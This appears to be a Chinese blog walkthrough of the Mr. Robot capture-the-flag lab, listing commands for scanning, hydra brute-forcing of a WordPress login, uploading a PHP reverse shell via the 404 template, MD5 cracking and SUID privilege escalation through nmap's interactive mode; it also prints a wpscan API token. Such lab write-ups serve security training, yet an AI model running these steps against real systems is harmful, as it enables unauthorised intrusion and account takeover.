【靶机】MR.ROBOT思考与总结

简介: 本次靶机比较简单,适合初学者练手。

个别细节请看视频

地址

https://www.bilibili.com/video/BV12d4y1G71K

靶机可以去tryhackme,也可以去vulnhub

具体如何下载安装请看dc-1

信息收集

nmap -sP 192.168.92.0/24

Snipaste_2022-09-05_11-41-02

 

nmap 192.168.92.131

Snipaste_2022-09-05_11-43-00

 

wpscan –url ip

wp 4.3.1

http://10.10.37.114/robots.txt

 

拿到flag1

http://10.10.37.114/fsocity.tic

 

爆破

 

 

hydra -l Elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64

 

Snipaste_2022-09-05_12-37-20

 

hydra -vV -l elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

Snipaste_2022-09-05_12-11-49

 

wpscan --url http://10.10.37.114/ -U Elliot -P ./1.txt --api-token oiurrxr07NwxeiwmsrUe0fpavNC6hrjQ12a0ZGwfMJo

Snipaste_2022-09-05_12-11-40

 

 

拿shell

find / -name php-reverse-shell.php

将里面的内容复制粘贴到404.php

Snipaste_2022-09-05_12-15-38

 

 

Snipaste_2022-09-05_12-42-57

 

拿到flag2

 

python -c 'import pty; pty.spawn("/bin/bash")'

 

 

 

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt 6.txt --fork=10

 

 

 

提权

 

 

find / -user root -perm -4000 2>/dev/null

nmap --interactive

!sh

拿到root权限

Snipaste_2022-09-05_12-56-44

拿到flag3

目录
相关文章
|
1月前
|
自然语言处理 数据可视化 数据挖掘
Agent实操(四):Code Interpreter,生成二维码、视频、PDF转txt等炸裂功能
本文介绍Agent自带的Code Interpreter有哪些高级而实用的能力
Agent实操(四):Code Interpreter,生成二维码、视频、PDF转txt等炸裂功能
|
8月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
93 0
|
SQL 数据库 数据安全/隐私保护
sqli-labs less5,8,9详解(py脚本)
sqli-labs less5,8,9详解(py脚本)
sqli-labs less5,8,9详解(py脚本)
|
安全 数据库 Python
sqli-labs less9详解(附py脚本)
sqli-labs less9详解(附py脚本)
sqli-labs less9详解(附py脚本)
|
安全 Shell Linux
靶机实战-vuluhub系列-Hack djinn:1 : walkthrough
靶机实战-vuluhub系列-Hack djinn:1 : walkthrough
靶机实战-vuluhub系列-Hack djinn:1 : walkthrough
|
Java Maven
jsweet-examples下载测试
jsweet-examples下载测试
38 0
|
安全 Shell Apache
vulnhub靶机22 02-Breakout.zip
vulnhub靶机22 02-Breakout.zip
vulnhub靶机22 02-Breakout.zip
Cypress系列(42)- visit() 命令详解
Cypress系列(42)- visit() 命令详解
394 0
Cypress系列(42)- visit() 命令详解
|
机器人 Java 测试技术
Robot Framework(2)- 快速安装
Robot Framework(2)- 快速安装
191 0
Robot Framework(2)- 快速安装
Cypress系列(97)- end() 命令详解
Cypress系列(97)- end() 命令详解
117 0
Cypress系列(97)- end() 命令详解